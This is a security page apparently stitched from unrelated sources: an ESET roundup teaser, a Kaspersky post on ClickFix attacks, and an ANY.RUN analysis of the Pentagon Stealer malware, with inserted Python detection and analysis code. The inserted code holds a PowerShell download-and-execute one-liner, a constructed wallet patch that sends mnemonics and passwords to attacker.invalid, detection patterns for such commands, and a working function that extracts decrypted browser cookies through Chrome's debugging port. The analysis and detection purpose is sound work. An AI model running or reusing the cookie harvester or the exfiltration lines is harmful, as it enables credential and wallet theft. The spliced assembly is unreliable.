From the near-demise of MITRE’s CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity
This month in security with Tony Anscombe – April 2025 edition (posted 2025-04-30)
Attackers are increasingly using the ClickFix technique to infect Windows computers by getting users to run malicious scripts themselves. The tactic was first seen in the spring of 2024, and since then attackers have come up with a number of pretexts for it.
What is ClickFix?
The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering. Under one pretext or another, attackers convince the user to copy a long command line (in the vast majority of cases a PowerShell one-liner), paste it into the system’s Run dialog, and press Enter, which is what ultimately compromises the system.
The attack normally begins with a pop-up window imitating a notification about a technical problem. To fix the problem, the user is asked to perform a few simple steps, which boil down to copying a string and executing it through the Run dialog. In Windows 11, PowerShell commands can also be executed from the search box for apps, settings and documents that opens when you click the Start button, so sometimes the victim is told to paste the text there instead.
ClickFix attack – how to infect your own computer with malware in three easy steps.
This technique earned itself the name ClickFix because usually the notification contains a button, the name of which is somehow related to the verb “to fix” (Fix, How to fix, Fix it…), which the user needs to click to solve the alleged problem or see instructions for solving it. However, this isn’t a mandatory element — the need to launch some code can be justified by the requirement to check the computer’s security, or, for example, to confirm that the user is not a robot. In this case, the Fix button can be omitted.
An example of instructions for confirming that you’re not a robot.
The scheme may differ slightly from case to case, but attackers typically give the victim the following instructions:
click the button to copy the code that solves the problem;
press the key combination [Win] + [R];
press the combination [Ctrl] + [V];
press [Enter].
So what actually happens? The first action (clicking the button) copies a script the user never sees to the clipboard. The second ([Win] + [R]) opens the Run dialog, which Windows provides to quickly launch programs, open files and folders, and enter commands. The third ([Ctrl] + [V]) pastes the PowerShell command into the Run dialog from the clipboard. And the fourth ([Enter]) launches it with the current user’s privileges.
As a result of executing the script, malware is downloaded and installed on the computer, with the specific payload varying from campaign to campaign. In other words, the user runs a malicious script on their own system and infects their own computer.
Typical attacks using the ClickFix technique
Sometimes attackers create their own websites and lure users to them with various tricks; in other cases they compromise existing websites and make them display a pop-up with the instructions. Similar instructions are also delivered under various pretexts via email, social networks, or even instant messengers. Here are some typical scenarios in which this technique is used:
1. Unable to display the page, need to refresh the browser
A classic scenario in which the visitor doesn’t see the page they expected to and is told they need to install a browser update to display it.
2. Error loading a document on a website
Another standard tactic: the user isn’t allowed to view a certain document in Microsoft Word or PDF format. Instead, they’re shown a notification asking to install a plugin for viewing the PDF or “Word online”.
3. Error opening a document from email
In this case attackers disguise the file format. The victim sees a .pdf or .docx icon, but in reality clicks on an HTML file that opens in the browser. From there everything is similar to the previous case: a supposedly missing plugin, malicious instructions, and the familiar “How to fix” button.
4. Problems with the microphone and camera in Google Meet or Zoom
A more unusual variation of the ClickFix tactic is used on fake Google Meet or Zoom websites. The user receives a link for a video call, but “is not allowed to join” it, because there are problems with their microphone and camera. The message “explains” how to fix it.
5. Prove that you’re not a robot – fake CAPTCHA
Finally, the most curious version of the attack: the site visitor is asked to complete a fake CAPTCHA to prove they’re not a robot. The required proof is, of course, to follow the instructions in the pop-up window.
Prove you’re not a robot – to do this, run a malicious script on your computer.
How to protect yourself from ClickFix attacks?
The simplest mechanism for protecting your company from ClickFix attacks is to block the [Win] + [R] key combination on employee workstations: the Explorer policy “Remove Run menu from Start Menu” (registry value NoRun) disables both the Run menu item and the shortcut, and the Run dialog is hardly needed in the day-to-day work of the typical employee. However, this isn’t a panacea. As noted above, in Windows 11 the command can be launched from the search box, and some variations of this attack include more detailed instructions telling the user how to open the Run dialog manually.
Therefore, protective measures should be comprehensive and primarily aimed at training employees. It’s worth conveying to them that a website or message asking them to perform manual actions on the system is an extremely alarming sign.
Here are some tips on how to protect your organization’s employees from attacks using ClickFix tactics:
Raise employee awareness of cyberthreats, including new tactics, with specialized training. Organizing such training is easy: just use our automated educational Kaspersky Automated Security Awareness Platform.
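Two checks that follow from the four-step chain and the mitigation advice above, written as an added example for this page (it is not code from the Kaspersky post). The first flags process-creation events in which explorer.exe, the parent of anything started from the Run dialog or the search box, spawns a script interpreter with a command line that looks pasted (hidden window, remote fetch, encoded body). The second parses a `reg export` of the RunMRU key, where Explorer keeps every string submitted through Win+R, so a pasted one-liner is recoverable after the fact. The sample events and the registry excerpt are constructed, and the URLs are placeholders.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 / Security 4688 (parent image,
# child image, command line). The first and last rows model the chain described above; the URLs are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iex (irm https://example.invalid/fix)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -NoProfile -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://example.invalid/verify.hta"},
]

# Constructed excerpt of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`.
# Explorer keeps every string submitted through the Run dialog here: one REG_SZ per entry, suffixed "\1",
# and MRUList holds the value names in most-recent-first order. A pasted ClickFix one-liner survives here.
SAMPLE_RUNMRU = r'''
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="powershell -w hidden -c \"iex (irm https://example.invalid/fix)\"\\1"
"b"="notepad\\1"
"MRUList"="ab"
'''

# Interpreters a ClickFix lure typically ends up launching from the Run dialog or the search box.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe", "curl.exe"}

# Fragments typical of pasted download-and-execute one-liners: hidden window, encoded body, remote fetch.
SUSPICIOUS = [
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-webrequest", r"downloadstring",
    r"(^|\s)-e(nc|ncodedcommand)?\b", r"(^|\s)-w(indowstyle)?\s+hidden", r"https?://", r"\.hta\b",
]

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def suspicious_fragments(cmd: str) -> list:
    return [p for p in SUSPICIOUS if re.search(p, cmd, re.IGNORECASE)]

def flag_clickfix(events: list, min_hits: int = 2) -> list:
    """Return (command line, matched fragments) for interpreters spawned directly by explorer.exe,
    which is what Win+R and the search box produce, with enough one-liner markers to look pasted."""
    flagged = []
    for ev in events:
        if _basename(ev["parent"]) != "explorer.exe" or _basename(ev["image"]) not in INTERPRETERS:
            continue
        hits = suspicious_fragments(ev["cmd"])
        if len(hits) >= min_hits:
            flagged.append((ev["cmd"], hits))
    return flagged

def parse_runmru(reg_export: str) -> list:
    """Return the Run-dialog history, most recent first, with reg-export escaping and the "\\1" suffix removed."""
    entries, order = {}, ""
    for line in reg_export.splitlines():
        m = re.match(r'"(\w+)"="(.*)"$', line.strip())
        if not m:
            continue
        name, value = m.group(1), re.sub(r"\\(.)", r"\1", m.group(2))  # unescape \\ and \"
        if name == "MRUList":
            order = value
        else:
            entries[name] = value.removesuffix("\\1")
    return [entries[c] for c in order if c in entries]

def suspicious_runmru(reg_export: str, min_hits: int = 2) -> list:
    """Forensic check on a machine already suspected of infection: RunMRU entries that look pasted."""
    return [cmd for cmd in parse_runmru(reg_export) if len(suspicious_fragments(cmd)) >= min_hits]

if __name__ == "__main__":
    for cmd, hits in flag_clickfix(SAMPLE_EVENTS):
        print("process chain:", cmd, hits)
    for cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print("RunMRU:", cmd)
```

The build script started from VS Code is deliberately not flagged: the parent is not explorer.exe, and that parent check is what keeps the rule quiet on ordinary administrative PowerShell use. Tune `min_hits` and `SUSPICIOUS` to the lures you actually see; the fragments above are the ones common to the scenarios described in this post.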
What is ClickFix and how to protect your company | Kaspersky official blog (posted 2025-04-29)
This article provides a technical analysis of an emerging malware family named Pentagon Stealer. The research was prepared by the analyst team at ANY.RUN.
Key Takeaways
Variants: Exists in Python (AES-encrypted, multi-stage) and Golang (unencrypted, part of attack chains) versions.
Data Theft: Steals browser credentials, cookies, crypto wallet data (Atomic/Exodus), Discord/Telegram tokens, and specific files.
Debug Mode Exploitation: Launches Chromium-based browsers with a remote debugging port and asks the browser itself for its cookies, so the stealer never has to decrypt DPAPI- or App-Bound-encrypted values.
Crypto Wallet Injection: Replaces app.asar files in Atomic/Exodus wallets with patched versions to steal mnemonics/passwords, using a public proof-of-concept available on GitHub.
Evolution and Campaigns: Spread via typosquatting, later under the names 1312, Acab, Vilsa, and BLX stealer. BLX adds clipboard, screenshot, and Steam/Epic data theft.
C2 Communication: Uses HTTP requests with servers like pentagon[.]cy and stealer[.]cy; BLX uploads to gofile.io, sending links to C2.
Ongoing Threat: Simple but persistent, with new variants showing minor updates, continuing to pose risks.
How We Discovered Pentagon Stealer
In early March of this year, when browsing Public submissions, the ANY.RUN team came across an interesting malware sample written in Golang.
Image 3. Sandbox analyses with the Pentagon tag displayed in TI Lookup
Among the search results, we identified a sandbox analysis of a website hosted on the domain pentagon.cy that featured the admin panel of this malware. Thus, we named it Pentagon Stealer.
Image 4. The admin panel
Exploring the website further, we discovered that there was also a Python-based version of this malicious program, available at pentagon[.]cy/paste?userid=<n>. You can see the page in this sandbox session.
Image 5. The original page containing a dropper script for deploying the first stage of the malware
Considering the lack of public information on the malware and its potential to pose serious threat to our clients, we decided to analyze it and collect essential intel for effective detection of Pentagon Stealer.
Here’s what we’ve found.
Let’s start with the Python variant which still can be found on the attackers’ infrastructure to this day. Next, we’ll compare its functionality to that of the previous versions.
Initial Stage: Script Dropper
As seen in the sandbox analysis, the attack begins with a script dropper. Its purpose is to launch python_setup.py, which is encrypted with Fernet (AES-128 in CBC mode, with an HMAC-SHA256 tag over the whole token).
Image 6. Decrypted script in CyberChef
Use this decryption recipe in CyberChef for the initial and all following stages: the algorithm stays the same, only the key changes.
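A scripted equivalent of that CyberChef recipe, added here as an example (it is not ANY.RUN's tooling). The structural helpers show what a Fernet token and key actually contain, verify the HMAC before any decryption so a wrong key is caught early, and the decryption itself uses the `cryptography` package the droppers import. `peel_stages` assumes each stage embeds the next as an inline `exec(Fernet(b'<key>').decrypt(b'<token>'))` with both literals present; that shape is an assumption about the dropper, not something the page shows, so adjust `STAGE_RE` to the real sample.

```python
import base64, hashlib, hmac, re, struct

def split_fernet_key(key_b64: bytes) -> tuple:
    """A Fernet key is 32 random bytes in urlsafe base64: bytes 0-15 sign (HMAC-SHA256), 16-31 encrypt (AES-128-CBC)."""
    raw = base64.urlsafe_b64decode(key_b64)
    if len(raw) != 32:
        raise ValueError("Fernet key must decode to 32 bytes")
    return raw[:16], raw[16:]

def parse_fernet_token(token: bytes) -> dict:
    """Token layout: 0x80 | 8-byte big-endian timestamp | 16-byte IV | ciphertext (PKCS7, multiple of 16) | 32-byte HMAC."""
    raw = base64.urlsafe_b64decode(token)
    if not raw or raw[0] != 0x80 or len(raw) < 1 + 8 + 16 + 16 + 32:
        raise ValueError("not a Fernet token")
    return {
        "timestamp": struct.unpack(">Q", raw[1:9])[0],
        "iv": raw[9:25],
        "ciphertext": raw[25:-32],
        "tag": raw[-32:],
        "signed": raw[:-32],
    }

def verify_fernet_tag(key_b64: bytes, token: bytes) -> bool:
    """Cheap pre-check that the key found next to a token belongs to it: the HMAC covers everything but the tag."""
    sign_key, _ = split_fernet_key(key_b64)
    t = parse_fernet_token(token)
    return hmac.compare_digest(hmac.new(sign_key, t["signed"], hashlib.sha256).digest(), t["tag"])

def fernet_decrypt(key_b64: bytes, token: bytes) -> bytes:
    """Same operation as the CyberChef recipe, via the cryptography package the droppers themselves import.
    Imported lazily so the structural helpers above work on a box without it."""
    from cryptography.fernet import Fernet
    return Fernet(key_b64).decrypt(token)

# Assumed dropper shape: exec(Fernet(b'<key>').decrypt(b'<token>')) with both literals inline.
# That is a guess about the sample, not something shown on the page; adapt the pattern to the real stage.
STAGE_RE = re.compile(
    rb"Fernet\(\s*b?['\"]([A-Za-z0-9_\-=]+)['\"]\s*\)\s*\.decrypt\(\s*b?['\"]([A-Za-z0-9_\-=]+)['\"]\s*\)"
)

def peel_stages(stage: bytes, max_depth: int = 10) -> list:
    """Unwrap nested Fernet layers: each decrypted plaintext is searched for the next key/token pair.
    Returns every layer, outermost first; the last element is the first stage with no further wrapper."""
    layers = [stage]
    for _ in range(max_depth):
        m = STAGE_RE.search(layers[-1])
        if not m:
            break
        key, token = m.group(1), m.group(2)
        if not verify_fernet_tag(key, token):
            raise ValueError("HMAC mismatch: the key beside this token does not belong to it")
        layers.append(fernet_decrypt(key, token))
    return layers
```

Because the tag is checked with the signing half of the key before the encryption half is ever used, a sample whose literals were altered (or a key copied from the wrong stage) fails loudly instead of producing padding garbage. Fernet itself performs the same check inside `decrypt`, so the explicit call only matters for the diagnostics.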
Main Stealer Module
Once we decrypt the payload, we can see the code of the stealer’s main module.
First, it checks whether the directory “%LOCALAPPDATA%/HD Realtek Audio Player” exists on the victim’s computer. If not, it creates it and continues execution. The directory serves as an infection marker: it is how the malware checks whether the machine has already been infected.
The malware then begins to steal a variety of data, including:
Login credentials, cookies, and extension data from Chromium-based browsers and cookie data from Mozilla Firefox
Image 7. Code for stealing Firefox cookies
Data from apps for managing cryptocurrency wallets
Discord tokens and Telegram authorization data
Files with specific names and extensions from user directories
There are also two actions performed by the malware that stand out from the rest and are worth a more detailed analysis:
To steal cookies, Pentagon launches Chromium-based browsers in debug mode.
The malware also replaces app.asar files used by Exodus and Atomic wallets.
Let’s take a closer look at them.
Injection into Atomic and Exodus Crypto Wallets
The stealer can inject into two popular cryptocurrency wallet management applications: Atomic and Exodus. Both use Electron, which stores JavaScript code in app.asar files.
The injection performed by Pentagon involves replacing these files with attacker-patched versions.
Image 8 shows the stealer overwriting the app.asar content of both applications with data from its command server. Additionally, a loguuid is written to the LICENSE file in both cases, which allows the attackers to identify the victim.
Image 8. Code for injecting into Atomic and Exodus
But why did they overwrite app.asar and what specific changes were made?
Since .asar files are archives containing .js files, we can unpack them with 7-Zip (using an ASAR plugin) to analyze the code. As expected, the goal is to obtain the user’s mnemonic and password. The images below illustrate how this is done.
Image 9. Collection of the user data in Atomic Wallet
The images show how a packet, containing the user’s password, mnemonic, and wallet type, is formed. One of the headers includes the loguuid.
Image 10. Collection of the user data in Exodus Wallet
It’s worth noting that the attacker clearly used Inject_PoC in this part of the operation, as indicated by the code similarity.
For example, the Atomic Wallet section from the PoC repository looks like this:
Image 11. The attacker reused code for injecting into Atomic
The similarity is evident; the attacker merely simplified the packet. In the case of Atomic, even the targeted application version matches.
For Exodus, the code segment from the repository looks like this:
Image 12. Inject_PoC code for injecting into Exodus
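The injection above leaves two things behind that a responder can check without a 7-Zip plugin: a modified app.asar and a LICENSE file with an identifier appended. The following is an added example (not ANY.RUN's or the asar project's code) that reads the ASAR container directly, diffs a suspect archive against a known-good one taken from a fresh vendor install, and lists every URL literal in the bundled JavaScript so an exfil endpoint stands out. The layout it parses is the asar project's Pickle-based header (a uint32 4, the header length, the header JSON, then file bytes at offsets relative to the header end); the two archives it works on are constructed here, including the placeholder identifier and the attacker host.

```python
import hashlib, json, re, struct

def _pad4(n: int) -> int:
    return (4 - n % 4) % 4

def asar_pack(files: dict) -> bytes:
    """Build a flat ASAR archive (used here only to construct the test archives offline).
    Layout, as written by the asar project's Pickle serializer:
      u32 4 | u32 header_len | u32 header_len-4 | u32 json_len | JSON padded to 4 bytes | file contents
    Offsets in the JSON are decimal strings relative to the end of the header (file offset 8 + header_len)."""
    header, body = {"files": {}}, bytearray()
    for name, data in files.items():
        header["files"][name] = {"size": len(data), "offset": str(len(body))}
        body += data
    js = json.dumps(header, separators=(",", ":")).encode()
    padded = js + b"\0" * _pad4(len(js))
    header_buf = struct.pack("<II", 4 + len(padded), len(js)) + padded
    return struct.pack("<II", 4, len(header_buf)) + header_buf + bytes(body)

def asar_read(blob: bytes) -> dict:
    """Return {path: bytes} for every file stored inside the archive. Entries flagged "unpacked"
    live beside it in app.asar.unpacked and are skipped."""
    size_field, header_len = struct.unpack_from("<II", blob, 0)
    if size_field != 4:
        raise ValueError("not an ASAR archive")
    _, json_len = struct.unpack_from("<II", blob, 8)
    header = json.loads(blob[16:16 + json_len])
    base = 8 + header_len
    out = {}

    def walk(node: dict, prefix: str) -> None:
        for name, meta in node["files"].items():
            if "files" in meta:
                walk(meta, prefix + name + "/")
            elif not meta.get("unpacked"):
                off = base + int(meta["offset"])
                out[prefix + name] = blob[off:off + meta["size"]]

    walk(header, "")
    return out

def diff_archives(clean: bytes, suspect: bytes) -> dict:
    """Compare a known-good app.asar (from a fresh vendor install) with the one found on a suspect machine."""
    a, b = asar_read(clean), asar_read(suspect)
    digest = lambda d: hashlib.sha256(d).hexdigest()
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "modified": sorted(p for p in set(a) & set(b) if digest(a[p]) != digest(b[p])),
    }

URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"`)]*)?")

def outbound_urls(blob: bytes) -> dict:
    """Triage aid: every URL literal in the archive's JavaScript. An exfil endpoint shows up as a host
    the vendor never talks to."""
    found = {}
    for path, data in asar_read(blob).items():
        if path.endswith(".js"):
            urls = sorted({u.decode("ascii", "replace") for u in URL_RE.findall(data)})
            if urls:
                found[path] = urls
    return found

# Constructed archives: a "vendor" build and the same build after the kind of patch described above
# (a JS file that posts mnemonic and password elsewhere, and LICENSE carrying a victim identifier).
CLEAN_FILES = {
    "package.json": b'{"name":"wallet","version":"1.0.0"}',
    "LICENSE": b"MIT License\n",
    "main.js": b'const API="https://wallet-vendor.invalid/api";\nfunction unlock(password){ return decryptSeed(password); }\n',
}
PATCHED_FILES = dict(CLEAN_FILES)
PATCHED_FILES["main.js"] = (
    b'const API="https://wallet-vendor.invalid/api";\n'
    b'function unlock(password){ const mnemonic = decryptSeed(password);\n'
    b'  fetch("https://attacker.invalid/collect", {method:"POST", headers:{"X-Log-Uuid": LOG_UUID},\n'
    b'        body: JSON.stringify({mnemonic, password, wallet:"atomic"})});\n'
    b'  return mnemonic; }\n'
)
PATCHED_FILES["LICENSE"] = CLEAN_FILES["LICENSE"] + b"3f2a9c1e-0000-4000-8000-000000000000\n"
CLEAN_ASAR, PATCHED_ASAR = asar_pack(CLEAN_FILES), asar_pack(PATCHED_FILES)

if __name__ == "__main__":
    print(diff_archives(CLEAN_ASAR, PATCHED_ASAR))
    print(outbound_urls(PATCHED_ASAR))
```

On a real host, feed `asar_read` the bytes of `resources/app.asar` from the wallet's install directory and the same file from a pristine installer of the same version; the diff names exactly the files the stealer overwrote, and the URL listing on the modified JavaScript is usually enough to identify the collection endpoint without reading the whole bundle.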
Launching Browsers in Debug Mode
This is a common technique for obtaining cookies in unencrypted form.
In short, a Chromium-based browser started with a remote debugging port will hand over its cookies in plaintext through the DevTools protocol, because the browser decrypts them itself. If the standard method of extracting cookies from the profile’s files were used, the values would first need to be decrypted, which can be problematic.
These browsers use DPAPI to protect sensitive data. If the malware runs in the session of the user whose logon credentials the data was protected with, a call to CryptUnprotectData (the UnProtect() function) may be enough to decrypt it; otherwise, decryption can be extremely difficult. The task is further complicated by Application-Bound (App-Bound) Encryption, introduced in Chrome 127, which additionally ties the cookie key to the browser’s own binary through a privileged elevation service.
Here’s how debugging helps to get cookies in an easier way:
The browser is launched with a remote debugging port specified (conventionally 9222).
A GET request is made to http://localhost:9222/json, which returns a JSON response containing webSocketDebuggerUrl.
Commands can be sent to this URL using the WebSocket protocol.
Using the Network.getAllCookies command, the desired cookies are obtained, already decrypted by the browser.
Image 13. Code for launching browsers in debug mode
This method explains the unusual behavior of relaunching the browser that piqued our interest when we first came across Pentagon’s sample.
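The four-step exchange above, written out as an added example (not the stealer's code): the `/json` discovery response is parsed for a page target's `webSocketDebuggerUrl`, a minimal RFC 6455 client (stdlib only, client-side masking included) opens that endpoint, and one `Network.getAllCookies` message comes back with the jar already decrypted. `harvest_cookies` performs the live exchange against a browser on this host started with `--remote-debugging-port`; `SAMPLE_DISCOVERY` and `SAMPLE_REPLY` are constructed messages in the shape of the real ones so the parsers can be exercised offline.

```python
import base64, json, os, socket, struct, urllib.request

# Constructed messages shaped like the real exchange, so the parsers run offline.
SAMPLE_DISCOVERY = json.dumps([
    {"type": "background_page", "title": "ext", "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/BG1"},
    {"type": "page", "title": "New Tab", "url": "chrome://newtab/",
     "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/ABC123"},
])
SAMPLE_REPLY = json.dumps({"id": 1, "result": {"cookies": [
    {"name": "sid", "value": "constructed-session-value", "domain": ".example.invalid", "path": "/",
     "httpOnly": True, "secure": True},
]}})

def discover_targets(discovery_json: str) -> list:
    """/json lists every debuggable target; a page target's webSocketDebuggerUrl is the CDP endpoint."""
    return [t["webSocketDebuggerUrl"] for t in json.loads(discovery_json)
            if t.get("type") == "page" and "webSocketDebuggerUrl" in t]

def ws_frame(payload: bytes) -> bytes:
    """One client->server text frame (FIN=1, opcode 1). RFC 6455 requires clients to mask."""
    mask = os.urandom(4)
    n = len(payload)
    if n < 126:
        head = bytes([0x81, 0x80 | n])
    elif n < 65536:
        head = bytes([0x81, 0x80 | 126]) + struct.pack(">H", n)
    else:
        head = bytes([0x81, 0x80 | 127]) + struct.pack(">Q", n)
    return head + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(payload))

def ws_read(recv) -> bytes:
    """Read one server->client frame (servers never mask). `recv(n)` returns up to n bytes, like socket.recv.
    A very large cookie jar could arrive as continuation frames; this reader assumes a single frame."""
    def exactly(n: int) -> bytes:
        buf = b""
        while len(buf) < n:
            chunk = recv(n - len(buf))
            if not chunk:
                raise ConnectionError("connection closed mid-frame")
            buf += chunk
        return buf
    _, b1 = exactly(2)
    n = b1 & 0x7F
    if n == 126:
        n = struct.unpack(">H", exactly(2))[0]
    elif n == 127:
        n = struct.unpack(">Q", exactly(8))[0]
    return exactly(n)

def parse_cookie_reply(reply_json: str) -> list:
    """Network.getAllCookies answers with result.cookies; the values are already plaintext."""
    msg = json.loads(reply_json)
    if "error" in msg:
        raise RuntimeError(msg["error"])
    return [{"domain": c["domain"], "name": c["name"], "value": c["value"]} for c in msg["result"]["cookies"]]

def harvest_cookies(port: int = 9222) -> list:
    """The full exchange against a browser started with --remote-debugging-port=<port> on this host."""
    with urllib.request.urlopen(f"http://127.0.0.1:{port}/json") as r:
        ws_url = discover_targets(r.read().decode())[0]
    hostport, path = ws_url[len("ws://"):].split("/", 1)
    host, p = hostport.rsplit(":", 1)
    sock = socket.create_connection((host, int(p)))
    key = base64.b64encode(os.urandom(16)).decode()
    sock.sendall((f"GET /{path} HTTP/1.1\r\nHost: {hostport}\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
                  f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n").encode())
    resp = b""
    while b"\r\n\r\n" not in resp:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("handshake failed")
        resp += chunk
    if not resp.startswith(b"HTTP/1.1 101"):
        raise ConnectionError(resp.split(b"\r\n", 1)[0].decode(errors="replace"))
    sock.sendall(ws_frame(json.dumps({"id": 1, "method": "Network.getAllCookies"}).encode()))
    reply = ws_read(sock.recv)
    sock.close()
    return parse_cookie_reply(reply.decode())

def demo() -> dict:
    """Offline walk-through on the constructed messages."""
    return {"target": discover_targets(SAMPLE_DISCOVERY)[0], "cookies": parse_cookie_reply(SAMPLE_REPLY)}

if __name__ == "__main__":
    print(demo())
```

Nothing in this exchange touches DPAPI or the App-Bound key: the browser process, which already holds both, does the decryption. That is also why the detection opportunity lies in the launch itself (a browser process started with `--remote-debugging-port`, typically headless and with the user's real profile directory) and in a non-browser process connecting to that local port.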
Decryption and Transition to the Next Stage: runpython.py
The final part of the stealer module is the decryption and launch of the next stage, runpython.py.
Image 14. Code for initializing the next stage
Once we decrypt the payload, we can see the command used.
Image 15. Decrypted command for the next stage launch
Following the URL inside the command reveals the dropper script used for launching runpython.py.
Image 16. Runpython.py dropper script
Yet Another Stage: Functionality of runpython.py
Inside runpython.py, we can see the following bat-file:
Image 17. Bat-file loader of the next stage
It follows this algorithm:
Checks whether it has write access to system files, which indicates admin rights.
If not, creates a temporary VBS script to relaunch the current BAT script with admin rights.
Creates the directory C:\Windows\WinEmptyfold as an infection indicator.
Runs PowerShell to add a Microsoft Defender exclusion for the entire C: drive, so that nothing on it is scanned.
Downloads the next stage from a remote resource and executes it as RuntimeBroker.exe.
Deletes files and directories used by the stealer.
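The Defender exclusion in step four is the loudest thing this loader does. Defender records every configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, with the affected registry value after "New value:", so the exclusion for the whole C: drive is visible the moment it is set. The following is an added example (not ANY.RUN's code) that triages such events by how much of the machine each change blinds Defender to. The event text prefix is the real 5007 message; the registry paths in the sample events are constructed, and the exact message shape is an assumption to check against your own log export.

```python
import re

# Real 5007 text prefix; the registry paths after "New value:" below are constructed for this example.
PREFIX = ("Windows Defender Antivirus Configuration has changed. If this is an unexpected event you should "
          "review the settings as this may be the result of malware.")

def _event(new_value: str, old_value: str = "") -> str:
    return f"{PREFIX}\r\n\tOld value: {old_value}\r\n\tNew value: {new_value}"

SAMPLE_5007 = [
    _event(r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = 0x0"),
    _event(r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Vendor\agent.exe = 0x0"),
    _event(r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\RuntimeBroker.exe = 0x0"),
    _event(r"HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = 0x1"),
    _event("", r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\D:\build = 0x0"),  # a removal
]

NEW_VALUE_RE = re.compile(r"New value:\s*HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\(.+?) = (0x[0-9A-Fa-f]+)")

def parse_5007(message: str):
    """Return (kind, value, data) for a configuration change, or None if nothing was set (e.g. a removal).
    kind is Paths / Processes / Extensions for exclusions, or Setting for any other value."""
    m = NEW_VALUE_RE.search(message)
    if not m:
        return None
    rel, data = m.group(1), m.group(2)
    parts = rel.split("\\", 2)
    if parts[0] == "Exclusions" and len(parts) == 3:
        return parts[1], parts[2], data
    return "Setting", rel, data

def exclusion_risk(kind: str, value: str) -> str:
    """How much of the machine the change blinds Defender to."""
    if kind == "Setting":
        return "critical"                       # a protection feature toggled, not merely a scope carved out
    if kind == "Paths" and re.fullmatch(r"[A-Za-z]:\\?", value):
        return "critical"                       # a whole drive, as the loader above does for C:
    if kind in ("Processes", "Extensions"):
        return "high"                           # every file the named process opens / every file of that type
    if re.search(r"\.[A-Za-z0-9]{1,5}$", value):
        return "medium"                         # a single file
    return "high"                               # a directory and everything beneath it

def triage(messages: list) -> list:
    """(risk, kind, value) for every change in the input, in log order."""
    out = []
    for msg in messages:
        parsed = parse_5007(msg)
        if parsed:
            kind, value, _ = parsed
            out.append((exclusion_risk(kind, value), kind, value))
    return out

if __name__ == "__main__":
    for row in triage(SAMPLE_5007):
        print(*row)
```

The process exclusion deserves its "high" rating even though it names a single binary: a Processes exclusion matches by name regardless of path, so it covers whatever the malware drops under that name (the loader here runs its payload as RuntimeBroker.exe).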
In all samples we have analyzed (example), Pentagon Stealer exclusively dropped Purecrypter which then deployed a miner. However, it is possible that there can be alternative payloads.
Attack Chain and Timeline of Python-based Pentagon Stealer
Pentagon Stealer’s chain of attack can be represented in the following way:
Let’s now take a look at Pentagon’s development timeline and see what methods the attackers used for delivering it to victims.
March 2024: Typosquatting Campaign
One of the earliest campaigns we came across in our research involved masking Pentagon as popular PyPI Python packages using a technique called “typosquatting”.
In this version, the malware couldn’t steal Web Data from Chromium browsers, unencrypted cookies via browser debugging, or Telegram data. Additionally, the protocol for interacting with the C2 server was more primitive: all information was written to files, which were then sent to funcaptcha[.]ru/delivery.
September 2024: 1312 Stealer
In another campaign, the stealer was available under the name 1312 Stealer. ANY.RUN’s Public submissions help us track changes in the admin panel.
1312’s new functionality included stealing Web Data from Chromium-based browsers and Telegram tdata. Communication with the C2 server changed: passwords were sent to 1312services[.]ru/pw, Web Data to 1312services[.]ru/webdata, and everything else to 1312services[.]ru/delivery.
Now, it’s time to dissect the latest version of the stealer, which is currently being actively distributed. It kept the functionality of the Python version, but with some improvements described below.
Image 21. Detect It Easy identified the sample as being written in Go
Unlike its Python counterpart, this variant does not download subsequent stages independently. Instead, it is used as one of the modules in the attack chain, as shown by sandbox analysis. Learn more about this in the ‘Infection Methods’ section.
Upon launch, the stealer hides its console window and checks for the directory %LOCALAPPDATA%\Realtek HD Audio Service on the victim’s computer, indicating previous execution.
It then begins collecting information as described above. The main improvement, unique to the Golang version, is the ability to steal data not only from Firefox but also from other Gecko-based browsers, including:
Zen
SeaMonkey
Waterfox
K-Meleon
Thunderbird
IceDragon
Cyberfox
BlackHawk
Pale Moon
Mercury
Librewolf
The malware now can steal passwords from these browsers, in addition to cookies. The rest of the functionality remains unchanged, though the programming language has been altered.
C2 Communication Protocol
Regarding interaction with the C2 server, recent malware versions use two domains: stealer[.]cy and pentagon[.]cy. The communication method is identical in both the latest Python and Golang versions.
Image 22. How Pentagon Stealer communicates with C2
